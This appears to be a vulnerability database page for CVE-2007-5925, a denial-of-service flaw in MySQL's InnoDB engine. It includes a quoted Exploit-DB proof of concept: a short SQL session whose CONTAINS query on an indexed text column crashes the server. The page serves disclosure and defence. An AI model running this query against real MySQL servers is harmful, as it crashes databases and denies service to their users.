CVE-2007-5925 : Detail

CVE-2007-5925

A03-Injection
9.74%V3
Network
2007-11-10
01h00 +00:00
2018-10-03
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The convert_search_mode_to_innobase function in ha_innodb.cc in the InnoDB engine in MySQL 5.1.23-BK and earlier allows remote authenticated users to cause a denial of service (database crash) via a certain CONTAINS operation on an indexed column, which triggers an assertion error.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4 AV:N/AC:L/Au:S/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 30744

Publication date : 2007-11-04 23h00 +00:00
Author : Joe Gallo
EDB Verified : Yes

source: https://www.securityfocus.com/bid/26353/info MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input. Exploiting this issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers. This issue affects MySQL 5.1.23 and prior versions. mysql> CREATE TABLE `test` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, `foo` text NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; Query OK, 0 rows affected mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); Empty set mysql> ALTER TABLE test ADD INDEX (foo(100)); Query OK, 0 rows affected Records: 0 Duplicates: 0 Warnings: 0 mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');

Products Mentioned

Configuraton 0

Mysql>>Mysql >> Version To (including) 5.1.23_bk

References

http://secunia.com/advisories/27823
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/USN-1397-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://security.gentoo.org/glsa/glsa-200711-25.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.vupen.com/english/advisories/2007/3903
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/27649
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1018978
Tags : vdb-entry, x_refsource_SECTRACK
https://usn.ubuntu.com/559-1/
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.debian.org/security/2007/dsa-1413
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/28040
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2007-1157.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/28099
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/26353
Tags : vdb-entry, x_refsource_BID
http://www.redhat.com/support/errata/RHSA-2007-1155.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/28108
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/28025
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/28838
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/28128
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDKSA-2007:243
Tags : vendor-advisory, x_refsource_MANDRIVA
http://bugs.mysql.com/bug.php?id=32125
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/27568
Tags : third-party-advisory, x_refsource_SECUNIA